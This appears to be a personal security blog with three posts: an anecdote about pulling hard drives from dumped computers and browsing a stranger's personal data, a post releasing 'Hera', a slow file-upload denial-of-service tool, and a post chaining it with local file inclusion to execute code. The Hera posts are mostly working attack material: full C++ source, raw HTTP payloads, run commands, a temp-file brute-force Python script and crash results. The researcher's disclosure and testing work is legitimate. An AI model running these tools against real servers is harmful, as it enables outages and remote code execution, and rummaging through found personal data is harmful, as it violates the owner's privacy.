Don’t litter

I’ve always hate when people throw their thrash around. My opinion about someone can go from “respectable citizen that I look up to” to “Obvious douche-bag that doesn’t respect anyone but him/herself” if I see them throw stuff on the ground. I often see people do it, and I try to lecture them whenever I catch them in the act. My hopes are of course that they will feel at least some bit of shame and maybe change their behaviour in the future.

Anyway, so near our apartment there’s this recycling station. A few containers where you can throw paper, plastic, metal and glass. The usual. Once a week there’s this pile of crap that keeps showing up. It almost always follows the same pattern and always ends up at the same spot, which makes me think that it might be the same person doing it. The trash in the pile is usually empty boxes from some fast food place (kebab and then some text in Arabic or something) and then usually a few electronics.

It always irritates me to the point where I would like to catch them in the act. But I never do. Well, until now. Or I didn’t really catch them in the act. It was more about what they dumped this time. On Wednesday this week, in the morning when I was leaving some plastic in the container, I noticed something in the “illegally placed trash pile”. Two computers (My time to shine)! I checked if there were any hard drives in them, and there were. So I decided that if the machines were still there when I came back after work, I would go there with a screwdriver and take out the drives. I was a bit worried since it was the day when they usually empty the containers, so the risk was that they would just bring the computers with them when they emptied everything else.

When I came back after work, the containers were empty but the computers were still there on the ground. So I went home, took a screwdriver and went back. It was a strange case that had a locking mechanism for the hard drives which was not easy to get off. Also, during the time I was sitting there in the dark with my screwdriver and flashlight, someone came to empty their recyclables. I quickly stood up and hid my stuff under a plastic bag, then proceeded to empty some plastic I had brought with me, in the container (to seem less suspicious. It’s all about the looks!). When the person had left I continue with my secret mission, and managed to take out all three drives.

I plugged them into my dock at home and took a quick look at the first drive. Unformated as expected with Windows Vista installed (bleh). I created a virtual drive for VirtualBox so that I could try to start the operating system on it.

VBoxManage internalcommands createrawvmdk -filename “henrietta.vmdk” -rawdisk /dev/sdg

However, the operating system was damaged and the repair process didn’t seem to work. It might have been a driver issue since it tried to load some ATI drivers before it crashed every time. I wasn’t too interested in spending a large amount of time on this, so I proceeded to just look at the data on the drive from my Linux machine. It appears to have been owned by a Ukranian lady (both machines seems to have been owned by her). They could of course have been stolen from her, so shouldn’t be too quick to blame. But i rule that out as the browser history and the programs installed all followed a consistent pattern, and all accounts saved in the browser (chrome) were using the same email and password. For the sake of our lady of the day (Henrietta), I will not disclose any detailed personal info.

The first hard drive with Windows Vista contained everything I would need to hijack the targets Internet life.

  • Browser history
  • Cookies
  • Email address (henr*************@hotmail.com)
  • Account names
  • Passwords
  • Personal files (A lot of text documents)
  • Images (hundreds)
  • Videos
  • Music

And loads of other sensitive data. I took a look at the data and then I threw everything away. No accounts were ever tested or anything unethical like that. One could argue that just taking theses drives were unethical, but if you throw something on the ground with the intention of dumping it where it’s not supposed to be, you sort of resign your ownership of it. Still there is the possibility of it being stolen. None of the operating systems worked on the machines, and the hardware was very old and some of the cards were even visibly broken. So I doubt it was stolen and then dumped there. Why would a thief go to the trouble of dumping it at “almost” the right location.

The second harddrive followed the same pattern but had Windows XP installed on it. The same user and the same type of websites had been visited. It also had a data partition with hundreds of family photos, photos of the suspected owner, and all sorts of sensitive personal data.

The third drive was completely dead and I didn’t put any more time into it.

All drives will be given to a friend who will physically destroy them (take them apart and render them useless).

Anyway, if you’re a complete ass who can’t take responsibility for your crap and just throw everything around you as you please, at least don’t throw crap that could potentially be traced back to you. Or, maybe continue, so that it’s easier to catch you. Right, Henrietta?

Denial of service – Evil is an art form

Introduction

This article was originally planned to be a part of a larger project where a presentation at the developer conference Öredev was the second part. However, the presentation at Öredev got cancelled (I have stage fright so I don’t mind really). I have decided to put more energy into the writing part of this little project, do more tests and try to present some more interesting results.

The idea started with “People are so creative at messing up servers these days. I wanna do that”. And it ended in just that. People involved in some projects affected by this method have stated that they are either not vulnerable or that this attack is not dangerous and should not be considered a vulnerability. Some of these statements will be covered further down in the text. The first idea was born several years ago when I wrote a script called “Tsunami”, that simply bombs a server with file uploads. Not very efficient and I later abandoned the project as I could not get any interesting results out of it. The project was brought back to life not too long ago, and the very simple Tsunami script served as a base for the new Hera tool that will be described below.

TL;DR

By uploading a large amount of files to different server setups, and not finishing the upload (utilizing slow attack methods), one can get one or several of the following effects:

  • Make server unresponsive or respond with an internal server error message
  • Fill disk space resulting in different effects depending on server setup
  • Use up RAM and crash whole server

Basically it depends on the huge amount of temporary files being saved on the disk, the massive amount of file handlers being opened or if the data is stored in RAM instead of the disk. How the different results above are reached depends heavily on what type of server is used and how it is set up. The following setups were tested and will be covered in this article.

  • Windows Server with Apache
  • Windows Server with IIS 7
  • Linux server with Apache
  • Linux server with Nginx

It should be noted that some of theses effects are similar or identical to that of other attacks such as Slowloris or Slowpost. The difference is that some servers will handle file uploads differently and sometimes rather badly. This of course has different effects depending on the setup.

So here’s the thing

The original Tsunami script simply flooded a server with file uploads. The end result on a very low end machine was that the space ran out on the machine, eventually. But it was so extremely inefficient that it was not worth continuing the project. So this time I needed to figure out a way to keep the server from removing the files. For my initial testing when developing the tool I used an Apache with mod_php in Linux. Most settings were default apart from a few modifications to make the server allow more requests and in some cases be more stable, which you will see later on in this article when I list all the server results.

Now the interesting part about uploading a file to a server is that it has to store the data somewhere while the upload is being performed. Storing in RAM is usually very inefficient since it could lead to memory exhaustion very quickly (although some still do this, as you will see later in the results). Some will store the data in temporary files, which seems more reasonable. And in the case with mod_php, the data will be uploaded and stored in a temporary file before the data gets to your script/application. This was the first important thing I learned that made this slightly more exiting for me. Because this means that as long as we have access to a PHP script on a server, any script, we can upload a file and store it temporarily. Of course the file will be removed when the script has finished running, which was the case with the Tsunami script (I made a script that ran very slowly, to test this out. Didn’t get very promising results either way).

The code responsible for the upload can be found here.
https://github.com/php/php-src/blob/6053987bc27e8dede37f437193a5cad448f99bce/main/rfc1867.c

The RFC in question for reference
https://www.ietf.org/rfc/rfc1867.txt

This part is interesting, since I needed to make sure what the default settings was for file uploads. If the default was set to not allow file uploads, then this attack would be slightly less interesting.

/* If file_uploads=off, skip the file part */
if (!PG(file_uploads)) {
    skip_upload = 1;
} else if (upload_cnt <= 0) {
    skip_upload = 1;
    sapi_module.sapi_error(E_WARNING, "Maximum number of allowable file uploads has been exceeded");
}

Luckily it was set to on as default.
This means that given any standard Apache installation with mod_php enabled and at least one known PHP script reachable from the outside, this attack could be performed.

https://github.com/php/php-src/blob/6053987bc27e8dede37f437193a5cad448f99bce/main/main.c#L571

STD_PHP_INI_BOOLEAN("file_uploads", "1", PHP_INI_SYSTEM, OnUpdateBool, file_uploads, php_core_globals, core_globals)

 

https://github.com/php/php-src/blob/49412756df244d94a217853395d15e96cb60e18f/php.ini-development#L815

; Whether to allow HTTP file uploads.
; http://php.net/file-uploads
file_uploads = On

 

https://github.com/php/php-src/blob/49412756df244d94a217853395d15e96cb60e18f/php.ini-production#L815

; Whether to allow HTTP file uploads.
; http://php.net/file-uploads
file_uploads = On

 

As seen here, the file is uploaded to a temporary folder (normally /tmp on Linux) with a “php” prefix.
https://github.com/php/php-src/blob/6053987bc27e8dede37f437193a5cad448f99bce/main/rfc1867.c#L1021

if (!cancel_upload) {
    /* only bother to open temp file if we have data */
    blen = multipart_buffer_read(mbuff, buff, sizeof(buff), &end);
    #if DEBUG_FILE_UPLOAD
    if (blen > 0) {
    #else
    /* in non-debug mode we have no problem with 0-length files */
    {
        #endif
        fd = php_open_temporary_fd_ex(PG(upload_tmp_dir), "php", &temp_filename, 1);
        upload_cnt--;
        if (fd == -1) {
            sapi_module.sapi_error(E_WARNING, "File upload error - unable to create a temporary file");
            cancel_upload = UPLOAD_ERROR_E;
        }
    }
}

 

Checking a more recent version of PHP yields the same result.
Below is the latest commit as of 2016-10-20.

https://github.com/php/php-src/blob/49412756df244d94a217853395d15e96cb60e18f/php.ini-production#L815

;;;;;;;;;;;;;;;;
; File Uploads ;
;;;;;;;;;;;;;;;;

; Whether to allow HTTP file uploads.
; http://php.net/file-uploads
file_uploads = On

 

So now that I have confirmed the default settings in PHP, I can start experimenting with uploading files. A simple Apache installation on a Debian machine with mod_php enabled, and a test.php under /var/www/ should be enough. The test.php could theoretically be empty and this should work either way. Uploading a file is easy enough. Create a simple form in a html file and submit it with a file selected. Nothing new there. The file will get saved in /tmp and the information about the file will be passed on to test.php when it is called. Whether test.php does something with the file is irrelevant, it will still be deleted from /tmp once the script has finished. But we want it to stay in the /tmp folder for as long as possible.

After playing around in Burp for a while, I came to think about how Slowloris keeps a connection alive by sending headers very slowly, making the server prolong the timeout period for (sometimes) as long as the client want. What if we could send a large file to the server and then not finish it, and have the server think we want to finish the upload by sending one byte at a time with very long intervals?

Sure enough, by setting a content-length header larger than the actual data we have uploaded, we can keep the file in /tmp for a long period as long as we send some data once in a while (depends on the timeout settings). The original content-length of the below request was 16881, but I set it to 168810 to make the server wait for the rest of the data.

POST /test.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------1825653778175343117546207648
Content-Length: 168810

-----------------------------1825653778175343117546207648
Content-Disposition: form-data; name="file"; filename="data.txt"
Content-Type: text/plain

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
......

 

If we check /tmp we can see that the file is indeed there

jimmy@Enma /tmp $ ls /tmp/php*
/tmp/php5Ylw1J

 

jimmy@Enma /tmp $ cat /tmp/php5Ylw1J
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
.....

The default settings allows us to upload a total of 20 files in the same request, with a max POST size of 8MB. This makes the attack more useful as we can open 20 file descriptors now instead of just 1 as I assumed before. In this first test I didn’t send any data after the first chunk, thus the files were removed when the request timed out. But all files sent were there during the duration of the request.

POST /test.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------1825653778175343117546207648
Content-Length: 168810

-----------------------------1825653778175343117546207648
Content-Disposition: form-data; name="file"; filename="data.txt"
Content-Type: text/plain

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
......

-----------------------------1825653778175343117546207648
Content-Disposition: form-data; name="file"; filename="data.txt"
Content-Type: text/plain

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
......

-----------------------------1825653778175343117546207648
Content-Disposition: form-data; name="file"; filename="data.txt"
Content-Type: text/plain

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
......

 

Again, all files are saved as separate files in /tmp

jimmy@Enma /tmp $ ls /tmp/php*
/tmp/phpmESJII /tmp/phpQiDlOC /tmp/phps2zxLa

 

Okay fine, so it works. Now what?

Well now that I can persist a number of files on the target system for the duration of the request (which I can prolong via a slow http attack method), I need to write a tool that can utilize this to attack the target system with. This is how the Hera tool was born (don’t put too much thought into the name, it made sense at first when a friend suggested it, but we can’t remember why).

https://github.com/jra89/Hera

#define _GLIBCXX_USE_CXX11_ABI 0

#include
#include
#include
#include
#include #include
#include
#include
#include
#include
#include
#include
#include
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <sys/socket.h>
#include <arpa/inet.h>

using namespace std;

/*
~=Compile=~
g++ -std=c++11 -pthread main.cpp -o hera -lz

~=Run=~
./hera 192.168.0.209 80 5000 3 /test.php 0.03 20 0 0 20

~=Params=~
./hera host port threads connections path filesize files endfile gzip timeout

~=Increase maximum file descriptors=~
vim /etc/security/limits.conf

* soft nofile 65000
* hard nofile 65000
root soft nofile 65000
root hard nofile 65000

~=Increase buffer size for larger attacks=~

*/

string getTime()
{
    auto t = time(nullptr);
    auto tm = *localtime(&t);
    ostringstream out;
    out << put_time(&tm, "%Y-%m-%d %H:%M:%S");
    return out.str();
}

void print(string msg, bool mood)
{
    string datetime = getTime();
    if(mood)
    {
        cout << "[+][" << datetime << "] " << msg << endl;
    }
    else
    {
        cout << "[-][" << datetime << "] " << msg << endl; } } void *get_in_addr(struct sockaddr *sa) { if (sa->sa_family == AF_INET) {
        return &(((struct sockaddr_in*)sa)->sin_addr);
    }

    return &(((struct sockaddr_in6*)sa)->sin6_addr);
}

int doConnect(string *payload, string *host, string *port)
{
    int sockfd;
    struct addrinfo hints, *servinfo, *p = NULL;
    int rv, val;
    char s[INET6_ADDRSTRLEN];

    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;

    if ((rv = getaddrinfo(host->c_str(), port->c_str(), &hints, &servinfo)) != 0)
    {
        print("Unable to get host information", false);
    }

    while(!p)
    {
        for(p = servinfo; p != NULL; p = p->ai_next)
        {
            if ((sockfd = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1)
            {
                print("Unable to create socket", false);
                continue;
            }

            if (connect(sockfd, p->ai_addr, p->ai_addrlen) == -1)
            {
                close(sockfd);
                print("Unable to connect", false);
                continue;
            }

            //connected = true;
            break;
        }
    }

    int failures = 0;
    while(send(sockfd, payload->c_str(), payload->size(), MSG_NOSIGNAL) < 0)
    {
        if(++failures == 5)
        {
            close(sockfd);
            return -1;
        }
    }

    freeaddrinfo(servinfo);
    return sockfd;

}

void attacker(string *payload, string *host, string *port, int numConns, bool gzip, int timeout)
{
    int sockfd[numConns];
    fill_n(sockfd, numConns, 0);
    string data = "an";

    while(true)
    {
        for(int i = 0; i < numConns; ++i)
        {
            if(sockfd[i] <= 0)
            {
                sockfd[i] = doConnect(payload, host, port);
            }
        }

        for(int i = 0; i < numConns; ++i)
        {
            if(send(sockfd[i], data.c_str(), data.size(), MSG_NOSIGNAL) < 0)
            {
                close(sockfd[i]);
                sockfd[i] = doConnect(payload, host, port);
            }
        }

        sleep(timeout);
    }
}

string gen_random(int len)
{
    char alphanum[] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
    int alphaLen = sizeof(alphanum) - 1;
    string str = "";

    for(int i = 0; i < len; ++i)
    {
        str += alphanum[rand() % alphaLen];
    }

    return str;
}

string buildPayload(string host, string path, float fileSize, int numFiles, bool endFile, bool gzip)
{
    ostringstream payload;
    ostringstream body;
    int extraContent = (endFile) ? 0 : 100000;

    //Build the body
    for(int i = 0; i < numFiles; ++i)
    {
        body << "-----------------------------424199281147285211419178285rn";
        body << "Content-Disposition: form-data; name="" << gen_random(10) << ""; filename="" << gen_random(10) << ".txt"rn";
        body << "Content-Type: text/plainrnrn";

        for(int n = 0; n < (int)(fileSize*100000); ++n)
        {
            body << "aaaaaaaaan";
        }
    }

    //If we want to end the stream of files, add ending boundary
    if(endFile)
    {
        body << "-----------------------------424199281147285211419178285--";
    }

    //Build headers
    payload << "POST " << path.c_str() << " HTTP/1.1rn";
    payload << "Host: " << host.c_str() << "rn";
    payload << "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0rn";
    payload << "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";
    payload << "Accept-Language: en-US,en;q=0.5rn";
    payload << "Accept-Encoding: gzip, deflatern";
    payload << "Cache-Control: max-age=0rn";
    payload << "Connection: keep-alivern";
    payload << "Content-Type: multipart/form-data; boundary=---------------------------424199281147285211419178285rn";
    payload << "Content-Length: " << body.str().size()+extraContent << "rnrn";
    payload << body.str() << "rn";

    return payload.str();
}

void help()
{
    string help =
    "./hera host port threads connections path filesize files endfile gzip timeoutnn"
    "hostttHost to attackn"
    "portttPort to connect ton"
    "threadsttNumber of threads to startn"
    "connectionstConnections per threadn"
    "pathttPath to post data ton"
    "filesizetSize per file in MBn"
    "filesttNumber of files per request (Min 1)n"
    "endfilettEnd the last file in the request (0/1)n"
    "gzipttEnable or disable gzip compressionn";
    "timeouttnTimeout between sending of continuation data (to keep connection alive)n";

    cout << help;
}

int main(int argc, char *argv[])
{
    cout << "~=Hera 0.7=~nn";

    if(argc < 10) { help(); exit(0); } string host = argv[1]; string port = argv[2]; int numThreads = atoi(argv[3]); int numConns = atoi(argv[4]); string path = argv[5]; float fileSize = stof(argv[6]); int numFiles = atoi(argv[7]) > 0 ? atoi(argv[7]) : 2;
    bool endFile = atoi(argv[8]) == 1 ? true : false;
    bool gzip = atoi(argv[9]) == 1 ? true : false;
    float timeout = stof(argv[10]) < 0.1 ? 0.1 : stof(argv[10]);
    vector threadVector;

    print("Building payload", true);
    srand(time(0));
    string payload = buildPayload(host, path, fileSize, numFiles, endFile, gzip);
    //cout << payload << endl;

    print("Starting threads", true);
    for(int i = 0; i < numThreads; ++i)
    {
        threadVector.push_back(thread(attacker, &payload, &host, &port, numConns, gzip, timeout));
        sleep(0.1);
    }

    for(int i = 0; i < numThreads; ++i)
    {
        threadVector[i].join();
    }
}

 

The version above is an older one and if you want to test out the tool I recommend that you clone the repository from github (which is linked above). The newest version has support for gzip. However the gzip experiment did not produce the results I expected. Therefore support for sending gzip compressed data with the tool will be removed in the future. The tool compiles and works just fine as it is right now though. As the idea is to open a ton of connections to a target server, it is essential that you increase the amount of file descriptors that you can use in the system. This is usually set to something around 1024 or such. And the limit I have set in the example below can be anything, as long as you don’t reach the limit because then the test might fail.

/etc/security/limits.conf

* soft nofile 65000
* hard nofile 65000
root soft nofile 65000
root hard nofile 65000

 

This is also covered in the readme on github that I linked earlier.

Okay so how does this affect different servers?

Together with a colleague (Stefan Ivarsson), a number of tests were made and documented to test the effects this will have on different systems. The effects differs quite a bit, and if you want to make sure if this works on your own setup or not the best way would be to simply test it in a safe environment (Like a test server that is separated from your production environment).

Setup 1
Operating system: Debian (Jessie, VirtualBox)
Web server: Apache (2.4.10)
Scripting module: mod_php (PHP 5.6.19-0+deb8u1)
Max allowed files per request: 20 (Default)
Max allowed post size: 8 MB (Default)
RAM: 2GB
CPU Core: 1
HDD: 8GB

So basically what this meant for the test was that I could set my tool to send 20 files per request with a max size of 0.4 MB, but to give some margin for headers and such, I set it to 0.3 per file. There are two different ways that I wanted to test this attack. The first one is to send as large files as possible, which would fill up disk space and hopefully disrupt services as the machine ran out of space. The second way was to send as many small files as possible and make the server stressed by opening too many file handles. As it turns out, both methods are good for different servers and setup and will prove fatal for the server depending on certain factors (setup, ram, bandwidth, space etc).

So during the test with the above setup, I set the Hera tool to attack using 2500 threads and 2 sockets per thread. There were 20 files per request and each file was set to 0.3MB. This is 30GB worth of data being sent to the server, so if it doesn’t dispose of that information it will have to save it on either disk or in RAM, both not being enough. What happened was rather expected actually.

It should be noted that the default Apache installation allowed very few connections to be open, leading to a normal Slowloris effect. This is not what I was after and so I configured the server to allow more connections (each thread is about 1MB with this setup making it very inefficient, but don’t worry there are more test results further down). The server ran out of memory because of too many spawned Apache processes.

 

When the RAM was raised the space eventually ran out on the server.

As expected the number of files in the tmp folder exploded and kept the server CPU usage up during the whole time (until the disk space ran out of course in which case no more files could be created).

During the attack the Apache server was unresponsive from the outside, and when the HDD space ran out it became responsive again.

An interesting effect here was actually when I decided to halt the attack. This resulted in the CPU going up to 100% since the machine had to kill all the processes and remove all of the files. So I took this chance to immediately start the attack again to see what would happen. It would stay up at 100% CPU and continue its attempt in removing the files and processes while I was forcing it to create new ones at the same time.

Setup 2
Operating system: Windows Server 2012 (VirtualBox)
Web server: Apache (WAMP)
Scripting module: mod_php (PHP 5)
Max allowed files per request: 20 (Default)
Max allowed post size: 8 MB (Default)
RAM: 4GB
CPU Core: 1
HDD: 25GB

This test was conducted in a similar manner as the first one. It resulted in Apache being killed because it ate too much memory. The disk space also ran out after a while. The system became very unstable and applications got killed one after another to preserve memory (Firefox and the task manager for example). At first the same effect was reached as the connection pool ran out, but increasing the limit “fixed” that. The mpm_winnt_module was used in the first test. A more robust setup will be presented in a later test.

As you can see in the image above, the tmp files are created and persist throughout the test as expected.

The system starts killing processes when the RAM starts running out, so we are still seeing effects similar to that of a normal slowloris attack (that is, the apache processes are taking up a lot of memory for every thread started, this is nothing new).

 

But we are still getting our desired effect of a huge amount of files being uploaded and filling up the disk space, so that still works. After increasing the virtual machines RAM to 8GB the Apache server did not get killed during the attack. The server was mostly unresponsive during the attack and by setting the timeout of the tool to very low and the size of the files to very small, the server CPU load could be kept at around 90-100% constantly (Since it was creating and removing thousands of files all the time). At one point the Apache process stopped accepting any connections, even after the attack had stopped. Although this could not be reproduced very easily so I have yet to verify the cause of this. Another interesting effect of the attack was that the memory usage went up to 2.5-3GB and never went down again after the attack had finished (Trying to create a dump of the memory of the Apache process after the attack heavily messed up the machine so I gave up on that for now).

The picture above was taken when the process became unresponsive and stopped accepting connections. Although this cannot be seen in the picture, but instead demonstrates the memory usage several minutes after the attack had stopped.

Setup 3
Operating system: Debian (VirtualBox)
Web server: nginx
Scripting module: PHP-FPM (PHP 5)
Max allowed files per request: 20 (Default)
Max allowed post size: 1 MB (Default)
RAM: 4GB
CPU Core: 1
HDD: 25GB

In this test I tried the same tactic as before. One thing that I immediately noticed was that with a lot of connections and few files per request, the max allowed connections was hit pretty fast (which is not surprising).

But, with a lot of small files per request, something more interesting happened instead. It seemed to hit a max file opened limit which instead of a connection refused resulted in a 500 internal server error. Setting a small amount of files but changing the file size to larger appeared to have the same effect however. So this is probably the same effect as a slowpost attack.

Changing worker_connections in /etc/nginx/ngninx.conf to a higher value mostly fixed the issue with the first problem with opening a lot of slowloris-like connections (small amount of files only). But increasing the amount of files to the maximum (20) per request quickly downed the server again showing only an internal server error message. Changing the size of the data sent also had this effect of course.

A thing I noticed was that nginx does not hand over the data to PHP until the request has finished transmitting. This does not stop the creation of files since nginx needs to create temporary files as well. But it does stop the large amount of files being created as nginx will only create one file per request instead of a maximum of 20 like with mod_php.

Setup 4
Operating system: Windows Server 2012 (VirtualBox)
Web server: IIS 8
Scripting module: ASP.NET
RAM: 4GB
CPU Core: 1
HDD: 25GB

This test ended very similarly to the nginx one. The server saved the data in a single temporary file it seems and did not seem to have a lot of problems with the amount of connections to the server. In the end, when maxing the attack from the test attacking machine, the web server became unresponsive about 8/10 of the times. This was most likely more of a Slowloris/Slowpost type of effect rather than a result of a lot of files being created. More tests could be made on this setup to further investigate methods of bringing the server down, but because of the relatively bad result (compared to the other setups) I decided to leave it at that for now. The server can be stressed no doubt about that, but not in the way that I intended for this experiment.

Setup 5
Operating system: Debian (Amazon EC2, m4.xlarge)
Web server: Apache
Scripting module: PHP-FPM (PHP 7)
Max allowed files per request: 20 (Default)
Max allowed post size: 8 MB (Default)
RAM: 16GB
CPU Core: 1
HDD: 30GB

This test was very special and was the last very big test I wanted to make. The goal of the test was to try the attack method on a large more realistic setup in the cloud. To do this I took the help of Werner Kwiatkowski over at http://rustytub.com who (in exchanged for candy, herring and beverage) helped me to setup a realistic and stable server that could take a punch.

The first problem I had as the attacker, was that the server would only create a single temporary file per request, instead of a maximum of 20 like I was expecting. The second “problem” was that the server became unresponsive in a Slowloris/Slowpost kind of manner instead of being effected by my many uploaded files. This was because Werner had set it up in a way so that the server would rather become unresponsive than to crash catastrophically. This is of course preferred and defeated my tool in a way. So, to get my desired effect I actually had to change the max allowed connections of the server to a lot higher so that I could see the effects of all the files being created. This of course differs from my initial idea of only testing near default setups, but I felt it could be important to have some more realistic samples as well. And yes, I used hackme.biz for the final test.

The amount of files specified above seemed to be the max I could reach. However, after the limit was reached something very interesting happened. The server appeared to store the files that could not be written to temporary files, in memory instead. This made the RAM usage go completely out of control very quickly. It took a while for the attack to actually use up all of that RAM, but after about 30 minutes or so, it had finally managed to fill it all up.

The image above was taken about a minute before the server stopped responding and crashed because of memory exhaustion.

Logging into the AWS account and checking the EC2 instances makes it more clear that the node has crashed. Now, of course this could still mean that the effects we are seeing are still the effects of a Slowloris attack where the processes created are the ones using up all the memory. So to test that I did the same test with a Slowloris attack tool with this setup. The result was actually not that impressive even when I tried using more connections than with the Hera tool.

As you can see the memory usage for the same amount of threads/connections used is not even close. That is because this particular setup is not vulnerable to the normal Slowloris attack, nor is it vulnerable to Slowpost (I did not try Slowread and other slow attacks).

This time dumping memory was a lot easier so I could check if the data was still stored in memory even after the attack was in idle mode (As in, it was not currently transmitting a lot of data and was simply waiting for the timeout to occur). The data from the payload could be found in the process memory which explains why the RAM usage went out of control like it did. I have not investigated this any further though.

So, in summary

I would like to think that this method could be used for some pretty bad stuff. It’s not an entirely new attack method but rather a new way of performing slow attacks against servers that handles file uploads in a bad way. Not all of the setups were vulnerable to this method, but most of them were either vulnerable to this method or they were vulnerable to other slow attacks which became apparent during the test (For example slowpost on nginx setups).

This method can be used in other ways than crashing servers. It can be used in an attack to guess temporary file names when you only have a file inclusion vulnerability at your disposal. You can read the start of that project here.

When I started playing around with this method I contacted Apache, PHP and Redhat to see what they had to say about it. Apache said it does not directly affect them (which is true since in the case of mod_php that is in the hands of the PHP team). PHP said that it was not a security issue and that file uploads is not turned on by default. If you read the article you will see that this is just not true and I have asked them to clarify on what they mean about that, without getting an answer. Redhat were extremely helpful and even setup a test machine for the tool where they could see the effects. However, they did not deem this a vulnerability and closed the case. I still think it’s an interesting method and I also feel like it should be okay for me to post this now without regretting it later due to breaking any responsible disclosure policies.

Thanks for reading!

Local file inclusion with tmp files

A thing I noticed while writing the Hera tool and doing all the tests, is that some server setups did not have very good randomness in their temporary files. This opens up for some interesting opportunities if you happen to have found a local file inclusion vulnerability in an application.

Imagine the following not very good code in an application

<?php include($_GET['file']); >

Looks bad, and I promise this is not that unusual and we find it from time to time during our reviews.

And here are some temporary files that were created in the WAMP test that I did while writing the article for Hera. Notice that the random string after the “php” prefix is rather short and should be easy to predict or brute force.

So to test this I modified Hera a bit, or more specifically the payload builder of the tool to include a piece of PHP code at the end of every file uploaded to a server.

.....
//Build the body 
for(int i = 0; i < numFiles; ++i)
{
body << "-----------------------------424199281147285211419178285rn";
body << "Content-Disposition: form-data; name="" << gen_random(10) << ""; filename="" << gen_random(10) << ".txt"rn";
body << "Content-Type: text/plainrnrn";

for(int n = 0; n < (int)(fileSize*100000); ++n)
{
body << "aaaaaaaaan";
}

body << "<?='ThisShouldNotExist';?>n";
}
.....

Notice the “ThisShouldNotExist”. If the code gets executed that text will show up on the vulnerable page. Now we need another tool to constantly test including a set of temporary files that we think will show up eventually. I wrote a simple Python script for this.

from urllib import request, parse
 
def main():
 
    target = 'http://10.11.12.69/test.php?file=../tmp/'
    tmpFiles = ['php1.tmp', 'php1A00.tmp', 'php1A01.tmp', 'php1A1A.tmp', 'php1A1B.tmp', 'php1A.tmp', 'php1B.tmp']
 
    while True:
        for tmp in tmpFiles:
            if 'ThisShouldNotExist' in doRequest(target + tmp):
                print("Code executed")
                exit()
 
 
def doRequest(target):
    while True:
        try:
            req = request.Request(target)
            resp = request.urlopen(req)
            return resp.read().decode('UTF-8')
        except:
            pass
 
    return ''
 
if __name__ == '__main__':
    main()

And then we run the two tools, wait a little while and see the result. Notice how small the files are, to make the process quicker. We are not interested in sending a lot of data to the server this time. Of course this could all be optimized greatly, and right now the Hera tool will uploaded the set of files like normal. A more optimal solution would be to have Hera upload a set of files, then restart the attack so that a new set of tmp files would be created on the server. Thus raising the chance of our guessed tmp files to be created.

./hera 10.11.12.69 80 100 2 /index.php 0.001 20 0 0 40
~=Hera 0.8=~

[+][2016-10-28 17:23:17] Building payload
[+][2016-10-28 17:23:17] Starting threads
time python3 LocalExecPoC.py
Code executed

real 0m49.778s
user 0m5.528s
sys 0m0.828s

Now, this was on Windows. And the code for creating temporary files in mod_php is different depending on the operating system. The default function for Linux is more secure but could still be used as well (although this would take a lot more time). I will build a proof-of-concept for the Linux scenario as well, and update this article when it’s finished. But for now you will have to be satisfied with these results :-).

As you can see in the image above the names are more random and also longer on Linux, making this a lot harder to guess the name of. The code below shows some Windows specific code related to the creation of the temporary file. The complete code can be found in the link below.

https://github.com/php/php-src/blob/6053987bc27e8dede37f437193a5cad448f99bce/main/php_open_temporary_file.c#L165

#ifdef PHP_WIN32
cwdw = php_win32_ioutil_any_to_w(new_state.cwd);
pfxw = php_win32_ioutil_any_to_w(pfx);
if (!cwdw || !pfxw) {
    free(cwdw);
    free(pfxw);
    efree(new_state.cwd);
    return -1;
}

if (GetTempFileNameW(cwdw, pfxw, 0, pathw)) {

